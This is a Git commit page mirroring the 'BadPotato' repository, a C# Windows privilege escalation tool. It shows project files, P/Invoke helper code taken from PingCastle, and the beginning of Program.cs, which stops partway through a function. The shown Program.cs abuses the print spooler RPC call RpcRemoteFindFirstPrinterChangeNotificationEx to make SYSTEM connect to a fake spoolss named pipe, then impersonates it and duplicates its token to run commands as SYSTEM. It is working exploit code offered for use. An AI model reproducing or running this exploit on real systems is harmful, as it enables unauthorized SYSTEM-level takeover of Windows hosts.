JohnHammond
/
BadPotato
mirror of https://github.com/JohnHammond/BadPotato.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

push code

master
北辰 2020-05-10 18:06:24 +08:00
parent 62e2ea029c
commit 9d47ba775d
12 changed files with 3325 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
App.config Normal file
View File

@ -0,0 +1,6 @@
<?xml version="1.0" encoding="utf-8"?>
<configuration>
<startup>
<supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.0"/></startup>
</configuration>

57
BadPotato.csproj Normal file
View File

@ -0,0 +1,57 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
<Prefer32Bit>false</Prefer32Bit>
<UseVSHostingProcess>true</UseVSHostingProcess>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>none</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
<Prefer32Bit>false</Prefer32Bit>
</PropertyGroup>
<PropertyGroup>
<StartupObject>BadPotato.ExecuteRectangle</StartupObject>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Data" />
<Reference Include="System.Xml" />
</ItemGroup>
<ItemGroup>
<Compile Include="NativeMethods.cs" />
<Compile Include="Program.cs" />
<Compile Include="Properties\AssemblyInfo.cs" />
<Compile Include="RPC\lsa.cs" />
<Compile Include="RPC\nativemethods.cs" />
<Compile Include="RPC\nrpc.cs" />
<Compile Include="RPC\nullsession.cs" />
<Compile Include="RPC\rpcapi.cs" />
<Compile Include="RPC\samr.cs" />
<Compile Include="RPC\spool.cs" />
</ItemGroup>
<ItemGroup>
<None Include="App.config" />
</ItemGroup>
<ItemGroup>
<BootstrapperPackage Include="Microsoft.Net.Framework.3.5.SP1">
<Visible>False</Visible>
<ProductName>.NET Framework 3.5 SP1</ProductName>
<Install>false</Install>
</BootstrapperPackage>
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
</Project>

726
NativeMethods.cs Normal file
View File

@ -0,0 +1,726 @@
//
// Copyright (c) Ping Castle. All rights reserved.
// https://www.pingcastle.com
//
// Licensed under the Non-Profit OSL. See LICENSE file in the project root for full license information.
//
using System;
using System.ComponentModel;
using System.Diagnostics;
using System.Net;
using System.Runtime.InteropServices;
using System.Security.Permissions;
using System.Security.Principal;
using System.Text;
namespace PingCastle
{
public class NativeMethods
{
#region PInvoke Signatures
[DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
private static extern bool LogonUser(string
lpszUsername, string lpszDomain, string lpszPassword,
int dwLogonType, int dwLogonProvider, ref IntPtr phToken);
// logon types
const int LOGON32_LOGON_INTERACTIVE = 2;
const int LOGON32_LOGON_NETWORK = 3;
const int LOGON32_LOGON_NEW_CREDENTIALS = 9;
// logon providers
const int LOGON32_PROVIDER_DEFAULT = 0;
const int LOGON32_PROVIDER_WINNT50 = 3;
const int LOGON32_PROVIDER_WINNT40 = 2;
const int LOGON32_PROVIDER_WINNT35 = 1;
public static WindowsIdentity GetWindowsIdentityForUser(NetworkCredential credential, string remoteserver)
{
IntPtr token = IntPtr.Zero;
string domain = credential.Domain;
if (String.IsNullOrEmpty(domain))
domain = remoteserver;
Trace.WriteLine("Preparing to login with login = " + credential.UserName + " domain = " + domain);
bool isSuccess = LogonUser(credential.UserName, domain, credential.Password, LOGON32_LOGON_NEW_CREDENTIALS, LOGON32_PROVIDER_DEFAULT, ref token);
if (!isSuccess)
{
throw new Win32Exception();
}
return new WindowsIdentity(token);
}
[DllImport("advapi32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
static extern bool LookupAccountSid(
string lpSystemName,
[MarshalAs(UnmanagedType.LPArray)] byte[] Sid,
System.Text.StringBuilder lpName,
ref uint cchName,
System.Text.StringBuilder ReferencedDomainName,
ref uint cchReferencedDomainName,
out SID_NAME_USE peUse);
[DllImport("advapi32.dll", SetLastError = true)]
static extern bool LookupAccountName(
string lpSystemName,
string lpAccountName,
[MarshalAs(UnmanagedType.LPArray)] byte[] Sid,
ref uint cbSid,
StringBuilder ReferencedDomainName,
ref uint cchReferencedDomainName,
out SID_NAME_USE peUse);
const int NO_ERROR = 0;
const int ERROR_INSUFFICIENT_BUFFER = 122;
const int ERROR_INVALID_FLAGS = 1004;
public enum SID_NAME_USE
{
SidTypeUser = 1,
SidTypeGroup,
SidTypeDomain,
SidTypeAlias,
SidTypeWellKnownGroup,
SidTypeDeletedAccount,
SidTypeInvalid,
SidTypeUnknown,
SidTypeComputer
}
public static string ConvertSIDToName(string sidstring, string server)
{
string referencedDomain = null;
return ConvertSIDToName(sidstring, server, out referencedDomain);
}
public static SecurityIdentifier ConvertNameToSID(string accountName, string server)
{
byte[] Sid = null;
uint cbSid = 0;
StringBuilder referencedDomainName = new StringBuilder();
uint cchReferencedDomainName = (uint)referencedDomainName.Capacity;
SID_NAME_USE sidUse;
int err = NO_ERROR;
if (LookupAccountName(server, accountName, Sid, ref cbSid, referencedDomainName, ref cchReferencedDomainName, out sidUse))
{
return new SecurityIdentifier(Sid, 0);
}
else
{
err = Marshal.GetLastWin32Error();
if (err == ERROR_INSUFFICIENT_BUFFER || err == ERROR_INVALID_FLAGS)
{
Sid = new byte[cbSid];
referencedDomainName.EnsureCapacity((int)cchReferencedDomainName);
err = NO_ERROR;
if (LookupAccountName(null, accountName, Sid, ref cbSid, referencedDomainName, ref cchReferencedDomainName, out sidUse))
{
return new SecurityIdentifier(Sid, 0);
}
}
}
return null;
}
[EnvironmentPermissionAttribute(SecurityAction.Demand, Unrestricted = true)]
public static string ConvertSIDToName(string sidstring, string server, out string referencedDomain)
{
StringBuilder name = new StringBuilder();
uint cchName = (uint)name.Capacity;
StringBuilder referencedDomainName = new StringBuilder();
uint cchReferencedDomainName = (uint)referencedDomainName.Capacity;
SID_NAME_USE sidUse;
SecurityIdentifier securityidentifier = null;
referencedDomain = null;
try
{
securityidentifier = new SecurityIdentifier(sidstring);
}
catch (Exception ex)
{
Trace.WriteLine("Got " + ex.Message + " when trying to convert " + sidstring + " as sid");
Trace.WriteLine(ex.StackTrace);
return sidstring;
}
// try to resolve the account using the server
byte[] Sid = new byte[securityidentifier.BinaryLength];
securityidentifier.GetBinaryForm(Sid, 0);
int err = NO_ERROR;
if (!LookupAccountSid(server, Sid, name, ref cchName, referencedDomainName, ref cchReferencedDomainName, out sidUse))
{
err = System.Runtime.InteropServices.Marshal.GetLastWin32Error();
if (err == ERROR_INSUFFICIENT_BUFFER)
{
name.EnsureCapacity((int)cchName);
referencedDomainName.EnsureCapacity((int)cchReferencedDomainName);
err = NO_ERROR;
if (!LookupAccountSid(server, Sid, name, ref cchName, referencedDomainName, ref cchReferencedDomainName, out sidUse))
err = System.Runtime.InteropServices.Marshal.GetLastWin32Error();
}
}
if (err == 0)
{
referencedDomain = referencedDomainName.ToString();
if (String.IsNullOrEmpty(referencedDomain))
return name.ToString();
else
return referencedDomainName + "\\" + name;
}
Trace.WriteLine(@"Error " + err + " when translating " + sidstring + " on " + server);
return sidstring;
}
[StructLayout(LayoutKind.Sequential)]
public struct UNICODE_STRING : IDisposable
{
public ushort Length;
public ushort MaximumLength;
private IntPtr buffer;
[SecurityPermission(SecurityAction.LinkDemand)]
public void Initialize(string s)
{
Length = (ushort)(s.Length * 2);
MaximumLength = (ushort)(Length + 2);
buffer = Marshal.StringToHGlobalUni(s);
}
[SecurityPermission(SecurityAction.LinkDemand)]
public void Dispose()
{
Marshal.FreeHGlobal(buffer);
buffer = IntPtr.Zero;
}
[SecurityPermission(SecurityAction.LinkDemand)]
public override string ToString()
{
if (Length == 0)
return String.Empty;
return Marshal.PtrToStringUni(buffer, Length / 2);
}
}
[DllImport("samlib.dll"), System.Diagnostics.CodeAnalysis.SuppressMessage("Microsoft.Portability", "CA1901:PInvokeDeclarationsShouldBePortable", MessageId = "3")]
internal static extern int SamConnect(ref UNICODE_STRING serverName, out IntPtr hServerHandle, int desiredAccess, int trusted);
[DllImport("samlib.dll")]
internal static extern int SamOpenDomain(IntPtr SamHandle, int DesiredAccess, byte[] DomainId, out IntPtr DomainHandle);
[DllImport("samlib.dll")]
internal static extern int SamOpenAlias(IntPtr DomainHandle, int DesiredAccess, int AliasId, out IntPtr AliasHandle);
[DllImport("samlib.dll")]
internal static extern int SamGetMembersInAlias(IntPtr AliasHandle, out IntPtr Members, out int CountReturned);
[DllImport("samlib.dll")]
internal static extern int SamFreeMemory(IntPtr memory);
[DllImport("samlib.dll")]
internal static extern int SamCloseHandle(IntPtr SamHandle);
[DllImport("advapi32.dll", SetLastError = false)]
internal static extern int LsaNtStatusToWinError(int status);
internal enum SHARE_TYPE : uint
{
STYPE_DISK = 0, // Disk Share
STYPE_PRINTQ = 1, // Print Queue
STYPE_DEVICE = 2, // Communication Device
STYPE_IPC = 3, // IPC (Interprocess communication) Share
STYPE_HIDDEN_DISK = 0x80000000, // Admin Disk Shares
STYPE_HIDDEN_PRINT = 0x80000001, // Admin Print Shares
STYPE_HIDDEN_DEVICE = 0x80000002, // Admin Device Shares
STYPE_HIDDEN_IPC = 0x80000003, // Admin IPC Shares
// Need to add flags for
// STYPE_TEMPORARY
}
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
internal struct SHARE_INFO_503
{
public string shi503_netname;
[MarshalAs(UnmanagedType.U4)]
public SHARE_TYPE shi503_type;
public string shi503_remark;
[MarshalAs(UnmanagedType.U4)]
public int shi503_permissions; // used w/ share level security only
[MarshalAs(UnmanagedType.U4)]
public int shi503_max_uses;
[MarshalAs(UnmanagedType.U4)]
public int shi503_current_uses;
public string shi503_path;
public string shi503_passwd; // used w/ share level security only
public string shi503_servername;
[MarshalAs(UnmanagedType.U4)]
public int shi503_reserved;
public IntPtr shi503_security_descriptor;
}
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
internal struct SHARE_INFO_1
{
public string shi1_netname;
public uint shi1_type;
public string shi1_remark;
public SHARE_INFO_1(string sharename, uint sharetype, string remark)
{
this.shi1_netname = sharename;
this.shi1_type = sharetype;
this.shi1_remark = remark;
}
public override string ToString()
{
return shi1_netname;
}
}
[DllImport("Netapi32.dll", CharSet = CharSet.Unicode)]
internal static extern int NetShareEnum(
string ServerName,
int level,
ref IntPtr bufPtr,
uint prefmaxlen,
ref int entriesread,
ref int totalentries,
ref int resume_handle
);
[DllImport("Netapi32", CharSet = CharSet.Auto)]
internal static extern int NetApiBufferFree(IntPtr Buffer);
internal struct LSA_OBJECT_ATTRIBUTES
{
public UInt32 Length;
public IntPtr RootDirectory;
public UNICODE_STRING ObjectName;
public UInt32 Attributes;
public IntPtr SecurityDescriptor;
public IntPtr SecurityQualityOfService;
}
[DllImport("advapi32.dll")]
internal static extern uint LsaOpenPolicy(
ref UNICODE_STRING SystemName,
ref LSA_OBJECT_ATTRIBUTES ObjectAttributes,
uint DesiredAccess,
out IntPtr PolicyHandle
);
[DllImport("advapi32.dll")]
internal static extern uint LsaClose(IntPtr ObjectHandle);
[StructLayout(LayoutKind.Sequential)]
internal struct LSA_TRUST_INFORMATION
{
internal UNICODE_STRING Name;
internal IntPtr Sid;
}
[DllImport("advapi32.dll")]
internal static extern uint LsaEnumerateTrustedDomains(
IntPtr PolicyHandle,
ref IntPtr EnumerationContext,
out IntPtr Buffer,
UInt32 PreferedMaximumLength,
out UInt32 CountReturned
);
#endregion
[DllImport("advapi32.dll")]
internal static extern int LsaFreeMemory(IntPtr pBuffer);
[DllImport("advapi32.dll")]
internal static extern int LsaQueryForestTrustInformation(
IntPtr PolicyHandle,
ref UNICODE_STRING TrustedDomainName,
out IntPtr ForestTrustInfo
);
[StructLayout(LayoutKind.Sequential)]
internal struct LSA_FOREST_TRUST_INFORMATION
{
public UInt32 RecordCount;
public IntPtr Entries;
}
[StructLayout(LayoutKind.Sequential)]
internal struct LSA_FOREST_TRUST_DOMAIN_INFO
{
public IntPtr Sid;
public UNICODE_STRING DnsName;
public UNICODE_STRING NetbiosName;
}
[StructLayout(LayoutKind.Sequential)]
internal struct LSA_FOREST_TRUST_BINARY_DATA
{
public UInt32 Length;
public IntPtr Buffer;
}
[StructLayout(LayoutKind.Explicit)]
internal struct LSA_FOREST_TRUST_RECORD
{
[FieldOffset(0)]
public UInt32 Flags;
[FieldOffset(4)]
public UInt32 ForestTrustType;
[FieldOffset(8)]
public Int64 Time;
[FieldOffset(16)]
public UNICODE_STRING TopLevelName;
[FieldOffset(16)]
public LSA_FOREST_TRUST_DOMAIN_INFO DomainInfo;
[FieldOffset(16)]
public LSA_FOREST_TRUST_BINARY_DATA Data;
}
[DllImport("advapi32.dll", SetLastError = true)]
internal static extern uint LsaLookupSids(
IntPtr PolicyHandle,
int Count,
IntPtr ptrEnumBuf,
out IntPtr ptrDomainList,
out IntPtr ptrNameList
);
[DllImport("advapi32")]
internal static extern uint LsaLookupNames(
IntPtr PolicyHandle,
int Count,
UNICODE_STRING[] Names,
out IntPtr ReferencedDomains,
out IntPtr Sids
);
[StructLayout(LayoutKind.Sequential)]
internal struct LSA_REFERENCED_DOMAIN_LIST
{
public int Entries;
public IntPtr Domains;
}
[StructLayout(LayoutKind.Sequential)]
public struct LSA_TRANSLATED_NAME
{
public SID_NAME_USE Use;
public UNICODE_STRING Name;
public int DomainIndex;
}
[StructLayout(LayoutKind.Sequential)]
public struct LSA_TRANSLATED_SID
{
public SID_NAME_USE Use;
public uint RelativeId;
public int DomainIndex;
}
[SecurityPermission(SecurityAction.Demand, Flags = SecurityPermissionFlag.UnmanagedCode)]
public static SecurityIdentifier GetSidFromDomainName(string server, string domainToResolve)
{
NativeMethods.UNICODE_STRING us = new NativeMethods.UNICODE_STRING();
NativeMethods.LSA_OBJECT_ATTRIBUTES loa = new NativeMethods.LSA_OBJECT_ATTRIBUTES();
us.Initialize(server);
IntPtr PolicyHandle = IntPtr.Zero;
uint ret = NativeMethods.LsaOpenPolicy(ref us, ref loa, 0x00000800, out PolicyHandle);
if (ret != 0)
{
Trace.WriteLine("LsaOpenPolicy 0x" + ret.ToString("x"));
return null;
}
try
{
UNICODE_STRING usdomain = new UNICODE_STRING();
usdomain.Initialize(domainToResolve);
IntPtr ReferencedDomains, Sids;
ret = LsaLookupNames(PolicyHandle, 1, new UNICODE_STRING[] { usdomain }, out ReferencedDomains, out Sids);
if (ret != 0)
{
Trace.WriteLine("LsaLookupNames 0x" + ret.ToString("x"));
return null;
}
try
{
LSA_REFERENCED_DOMAIN_LIST domainList = (LSA_REFERENCED_DOMAIN_LIST)Marshal.PtrToStructure(ReferencedDomains, typeof(LSA_REFERENCED_DOMAIN_LIST));
if (domainList.Entries > 0)
{
LSA_TRUST_INFORMATION trustInfo = (LSA_TRUST_INFORMATION)Marshal.PtrToStructure(domainList.Domains, typeof(LSA_TRUST_INFORMATION));
return new SecurityIdentifier(trustInfo.Sid);
}
}
finally
{
LsaFreeMemory(ReferencedDomains);
LsaFreeMemory(Sids);
}
}
finally
{
NativeMethods.LsaClose(PolicyHandle);
}
return null;
}
//public static string GetNameFromSID(string server, SecurityIdentifier sidToResolve)
//{
// NativeMethods.UNICODE_STRING us = new NativeMethods.UNICODE_STRING();
// NativeMethods.LSA_OBJECT_ATTRIBUTES loa = new NativeMethods.LSA_OBJECT_ATTRIBUTES();
// us.Initialize(server);
// IntPtr PolicyHandle = IntPtr.Zero;
// int ret = NativeMethods.LsaOpenPolicy(ref us, ref loa, 0x00000800, out PolicyHandle);
// if (ret != 0)
// {
// Trace.WriteLine("LsaOpenPolicy 0x" + ret.ToString("x"));
// return null;
// }
// try
// {
// byte[] Sid = new byte[sidToResolve.BinaryLength];
// sidToResolve.GetBinaryForm(Sid, 0);
// GCHandle handle = GCHandle.Alloc(Sid, GCHandleType.Pinned);
// IntPtr array = handle.AddrOfPinnedObject();
// GCHandle handlearray = GCHandle.Alloc(array, GCHandleType.Pinned);
// IntPtr enumBuffer = IntPtr.Zero;
// IntPtr ReferencedDomains, NameList;
// ret = LsaLookupSids(PolicyHandle, 1, handlearray.AddrOfPinnedObject(), out ReferencedDomains, out NameList);
// handle.Free();
// handlearray.Free();
// if (ret != 0)
// {
// Trace.WriteLine("LsaLookupSids 0x" + ret.ToString("x"));
// return null;
// }
// try
// {
// LSA_REFERENCED_DOMAIN_LIST domainList = (LSA_REFERENCED_DOMAIN_LIST)Marshal.PtrToStructure(ReferencedDomains, typeof(LSA_REFERENCED_DOMAIN_LIST));
// if (domainList.Entries == 0)
// return null;
// LSA_TRUST_INFORMATION trustInfo = (LSA_TRUST_INFORMATION)Marshal.PtrToStructure(domainList.Domains, typeof(LSA_TRUST_INFORMATION));
// LSA_TRANSLATED_NAME translatedName = (LSA_TRANSLATED_NAME)Marshal.PtrToStructure(NameList, typeof(LSA_TRANSLATED_NAME));
// return trustInfo.Name.ToString() + "\\" + translatedName.Name;
// }
// finally
// {
// LsaFreeMemory(ReferencedDomains);
// LsaFreeMemory(NameList);
// }
// }
// finally
// {
// NativeMethods.LsaClose(PolicyHandle);
// }
//}
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
public struct DOMAIN_CONTROLLER_INFO
{
[MarshalAs(UnmanagedType.LPWStr)]
public string DomainControllerName;
[MarshalAs(UnmanagedType.LPWStr)]
public string DomainControllerAddress;
public uint DomainControllerAddressType;
public Guid DomainGuid;
[MarshalAs(UnmanagedType.LPWStr)]
public string DomainName;
[MarshalAs(UnmanagedType.LPWStr)]
public string DnsForestName;
public uint Flags;
[MarshalAs(UnmanagedType.LPWStr)]
public string DcSiteName;
[MarshalAs(UnmanagedType.LPWStr)]
public string ClientSiteName;
}
[Flags]
public enum DSGETDCNAME_FLAGS : uint
{
DS_FORCE_REDISCOVERY = 0x00000001,
DS_DIRECTORY_SERVICE_REQUIRED = 0x00000010,
DS_DIRECTORY_SERVICE_PREFERRED = 0x00000020,
DS_GC_SERVER_REQUIRED = 0x00000040,
DS_PDC_REQUIRED = 0x00000080,
DS_BACKGROUND_ONLY = 0x00000100,
DS_IP_REQUIRED = 0x00000200,
DS_KDC_REQUIRED = 0x00000400,
DS_TIMESERV_REQUIRED = 0x00000800,
DS_WRITABLE_REQUIRED = 0x00001000,
DS_GOOD_TIMESERV_PREFERRED = 0x00002000,
DS_AVOID_SELF = 0x00004000,
DS_ONLY_LDAP_NEEDED = 0x00008000,
DS_IS_FLAT_NAME = 0x00010000,
DS_IS_DNS_NAME = 0x00020000,
DS_RETURN_DNS_NAME = 0x40000000,
DS_RETURN_FLAT_NAME = 0x80000000,
DS_WEB_SERVICE_REQUIRED = 0x00100000,
}
[DllImport("Netapi32.dll", CharSet = CharSet.Unicode)]
internal static extern int DsGetDcName
(
[MarshalAs(UnmanagedType.LPWStr)]
string ComputerName,
[MarshalAs(UnmanagedType.LPWStr)]
string DomainName,
[In] IntPtr DomainGuid,
[MarshalAs(UnmanagedType.LPWStr)]
string SiteName,
DSGETDCNAME_FLAGS Flags,
out IntPtr pDOMAIN_CONTROLLER_INFO
);
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
public struct STAT_WORKSTATION_0
{
public long StatisticsStartTime;
public long BytesReceived;
public long SmbsReceived;
public long PagingReadBytesRequested;
public long NonPagingReadBytesRequested;
public long CacheReadBytesRequested;
public long NetworkReadBytesRequested;
public long BytesTransmitted;
public long SmbsTransmitted;
public long PagingWriteBytesRequested;
public long NonPagingWriteBytesRequested;
public long CacheWriteBytesRequested;
public long NetworkWriteBytesRequested;
public uint InitiallyFailedOperations;
public uint FailedCompletionOperations;
public uint ReadOperations;
public uint RandomReadOperations;
public uint ReadSmbs;
public uint LargeReadSmbs;
public uint SmallReadSmbs;
public uint WriteOperations;
public uint RandomWriteOperations;
public uint WriteSmbs;
public uint LargeWriteSmbs;
public uint SmallWriteSmbs;
public uint RawReadsDenied;
public uint RawWritesDenied;
public uint NetworkErrors;
public uint Sessions;
public uint FailedSessions;
public uint Reconnects;
public uint CoreConnects;
public uint Lanman20Connects;
public uint Lanman21Connects;
public uint LanmanNtConnects;
public uint ServerDisconnects;
public uint HungSessions;
public uint UseCount;
public uint FailedUseCount;
public uint CurrentCommands;
}
[DllImport("Netapi32.dll", CharSet = CharSet.Unicode)]
internal static extern uint NetStatisticsGet(
[In, MarshalAs(UnmanagedType.LPWStr)] string server,
[In, MarshalAs(UnmanagedType.LPWStr)] string service,
int level,
int options,
out IntPtr bufptr);
[SecurityPermission(SecurityAction.Demand, Flags = SecurityPermissionFlag.UnmanagedCode)]
public static DateTime GetStartupTime(string server)
{
IntPtr buffer = IntPtr.Zero;
uint ret = NetStatisticsGet(server, "LanmanWorkstation", 0, 0, out buffer);
if (ret != 0)
{
Trace.WriteLine("GetStartupTime " + server + " returned " + ret);
return DateTime.MinValue;
}
try
{
STAT_WORKSTATION_0 data = (STAT_WORKSTATION_0)Marshal.PtrToStructure(buffer, typeof(STAT_WORKSTATION_0));
return DateTime.FromFileTime(data.StatisticsStartTime);
}
finally
{
NetApiBufferFree(buffer);
}
}
[DllImport("winspool.drv", CharSet = CharSet.Unicode, EntryPoint = "OpenPrinterW", SetLastError = true)]
internal static extern bool OpenPrinter(string pPrinterName, out IntPtr phPrinter, IntPtr pDefault);
[DllImport("winspool.drv", CharSet = CharSet.Unicode, EntryPoint = "ClosePrinter", SetLastError = true)]
internal static extern bool ClosePrinter(IntPtr phPrinter);
[DllImport("Netapi32.dll", CallingConvention = CallingConvention.Winapi, SetLastError = true, CharSet = CharSet.Auto)]
internal static extern uint DsEnumerateDomainTrusts(string ServerName,
uint Flags,
out IntPtr Domains,
out uint DomainCount);
[Flags]
internal enum DS_DOMAIN_TRUST_TYPE : uint
{
DS_DOMAIN_IN_FOREST = 0x0001, // Domain is a member of the forest
DS_DOMAIN_DIRECT_OUTBOUND = 0x0002, // Domain is directly trusted
DS_DOMAIN_TREE_ROOT = 0x0004, // Domain is root of a tree in the forest
DS_DOMAIN_PRIMARY = 0x0008, // Domain is the primary domain of queried server
DS_DOMAIN_NATIVE_MODE = 0x0010, // Primary domain is running in native mode
DS_DOMAIN_DIRECT_INBOUND = 0x0020, // Domain is directly trusting
ALL = 0x003F,
}
[StructLayout(LayoutKind.Sequential)]
internal struct DS_DOMAIN_TRUSTS
{
[MarshalAs(UnmanagedType.LPTStr)]
public string NetbiosDomainName;
[MarshalAs(UnmanagedType.LPTStr)]
public string DnsDomainName;
public uint Flags;
public uint ParentIndex;
public uint TrustType;
public uint TrustAttributes;
public IntPtr DomainSid;
public Guid DomainGuid;
}
[SecurityPermission(SecurityAction.Demand, Flags = SecurityPermissionFlag.UnmanagedCode)]
internal static string GetDC(string domain, bool ADWS, bool forceRediscovery)
{
DOMAIN_CONTROLLER_INFO domainInfo;
const int ERROR_SUCCESS = 0;
IntPtr pDCI = IntPtr.Zero;
try
{
var flags = DSGETDCNAME_FLAGS.DS_DIRECTORY_SERVICE_REQUIRED |
DSGETDCNAME_FLAGS.DS_RETURN_DNS_NAME |
DSGETDCNAME_FLAGS.DS_IP_REQUIRED;
if (ADWS)
{
flags |= DSGETDCNAME_FLAGS.DS_WEB_SERVICE_REQUIRED;
}
if (forceRediscovery)
{
flags |= DSGETDCNAME_FLAGS.DS_FORCE_REDISCOVERY;
}
int val = DsGetDcName("", domain, IntPtr.Zero, "", flags, out pDCI);
//check return value for error
if (ERROR_SUCCESS == val)
{
domainInfo = (DOMAIN_CONTROLLER_INFO)Marshal.PtrToStructure(pDCI, typeof(DOMAIN_CONTROLLER_INFO));
return domainInfo.DomainControllerName.Substring(2);
}
else
{
throw new Win32Exception(val);
}
}
finally
{
if (pDCI != IntPtr.Zero)
NetApiBufferFree(pDCI);
}
}
}
}

294
Program.cs Normal file
View File

@ -0,0 +1,294 @@
using PingCastle.RPC;
using System;
using System.Runtime.ConstrainedExecution;
using System.Runtime.InteropServices;
using System.Security;
using System.Security.Principal;
using System.Text;
using System.Threading;
using static PingCastle.RPC.rprn;
namespace BadPotato
{
class ExecuteRectangle
{
public struct SECURITY_ATTRIBUTES
{
public int nLength;
public IntPtr lpSecurityDescriptor;
public int bInheritHandle;
}
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
public struct STARTUPINFO
{
public Int32 cb;
public string lpReserved;
public string lpDesktop;
public string lpTitle;
public Int32 dwX;
public Int32 dwY;
public Int32 dwXSize;
public Int32 dwYSize;
public Int32 dwXCountChars;
public Int32 dwYCountChars;
public Int32 dwFillAttribute;
public Int32 dwFlags;
public Int16 wShowWindow;
public Int16 cbReserved2;
public IntPtr lpReserved2;
public IntPtr hStdInput;
public IntPtr hStdOutput;
public IntPtr hStdError;
}
[StructLayout(LayoutKind.Sequential)]
public struct PROCESS_INFORMATION
{
public IntPtr hProcess;
public IntPtr hThread;
public int dwProcessId;
public int dwThreadId;
}
static void Main(string[] args)
{
Console.WriteLine(@"[*]
____ ______ __ __
/ __ )____ _____/ / __ \____ / /_____ _/ /_____
/ __ / __ `/ __ / /_/ / __ \/ __/ __ `/ __/ __ \
/ /_/ / /_/ / /_/ / ____/ /_/ / /_/ /_/ / /_/ /_/ /
/_____/\__,_/\__,_/_/ \____/\__/\__,_/\__/\____/
Github:https://github.com/BeichenDream/BadPotato/ By:BeichenDream
");
if (args.Length<1)
{
Console.WriteLine("[!] No Command");
return;
}
SECURITY_ATTRIBUTES securityAttributes = new SECURITY_ATTRIBUTES();
string pipeName = Guid.NewGuid().ToString("N");
Console.WriteLine("[*] PipeName : " + string.Format("\\\\.\\pipe\\{0}\\pipe\\spoolss", pipeName));
Console.WriteLine("[*] ConnectPipeName : " + string.Format("\\\\{0}/pipe/{1}", Environment.MachineName, pipeName));
IntPtr pipeHandle = CreateNamedPipeW(string.Format("\\\\.\\pipe\\{0}\\pipe\\spoolss", pipeName), 0x00000003| 0x40000000, 0x00000000, 10, 2048, 2048, 0, ref securityAttributes);
if (pipeHandle!=IntPtr.Zero)
{
Console.WriteLine(string.Format("[*] {0} Success! IntPtr:{1}", "CreateNamedPipeW",pipeHandle));
rprn rprn = new rprn();
DEVMODE_CONTAINER dEVMODE_CONTAINER = new DEVMODE_CONTAINER();
IntPtr rpcPrinterHandle = IntPtr.Zero;
rprn.RpcOpenPrinter(string.Format("\\\\{0}", Environment.MachineName), out rpcPrinterHandle, null, ref dEVMODE_CONTAINER, 0);
if (rpcPrinterHandle!=IntPtr.Zero)
{
if (rprn.RpcRemoteFindFirstPrinterChangeNotificationEx(rpcPrinterHandle, 0x00000100, 0, string.Format("\\\\{0}/pipe/{1}", Environment.MachineName, pipeName), 0) != -1)
{
Console.WriteLine(string.Format("[*] {0} Success! IntPtr:{1}", "RpcRemoteFindFirstPrinterChangeNotificationEx", rpcPrinterHandle));
Thread thread = new Thread(() => ConnectNamedPipe(pipeHandle, IntPtr.Zero));
thread.Start();
if (thread.Join(5000))
{
Console.WriteLine("[*] ConnectNamePipe Success!");
StringBuilder stringBuilder = new StringBuilder();
GetNamedPipeHandleState(pipeHandle, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero, stringBuilder, stringBuilder.Capacity);
Console.WriteLine("[*] CurrentUserName : " + Environment.UserName);
Console.WriteLine("[*] CurrentConnectPipeUserName : " + stringBuilder.ToString());
if (ImpersonateNamedPipeClient(pipeHandle))
{
Console.WriteLine("[*] ImpersonateNamedPipeClient Success!");
IntPtr hSystemToken = IntPtr.Zero;
if (OpenThreadToken(GetCurrentThread(), 983551, false, ref hSystemToken))
{
Console.WriteLine(string.Format("[*] {0} Success! IntPtr:{1}", "OpenThreadToken", hSystemToken));
IntPtr hSystemTokenDup = IntPtr.Zero;
if (DuplicateTokenEx(hSystemToken, 983551, 0, 2, 1, ref hSystemTokenDup))
{
Console.WriteLine(string.Format("[*] {0} Success! IntPtr:{1}", "DuplicateTokenEx", hSystemTokenDup));
if (SetThreadToken(IntPtr.Zero, hSystemToken))
{
Console.WriteLine("[*] SetThreadToken Success!");
Console.WriteLine("[*] CurrentThreadUserName : " + WindowsIdentity.GetCurrent(true).Name);
SECURITY_ATTRIBUTES saAttr = new SECURITY_ATTRIBUTES();
IntPtr out_read = IntPtr.Zero;
IntPtr out_write = IntPtr.Zero;
IntPtr err_read = IntPtr.Zero;
IntPtr err_write = IntPtr.Zero;
saAttr.nLength = Marshal.SizeOf(typeof(SECURITY_ATTRIBUTES));
saAttr.bInheritHandle = 0x1;
saAttr.lpSecurityDescriptor = IntPtr.Zero;
if (CreatePipe(ref out_read, ref out_write, ref saAttr, 0))
{
Console.WriteLine(string.Format("[*] {0} Success! out_read:{1} out_write:{2}", "CreateOutReadPipe", out_read, out_write));
}
else
{
Console.WriteLine("[!] CreateOutReadPipe fail!");
}
if (CreatePipe(ref err_read, ref err_write, ref saAttr, 0))
{
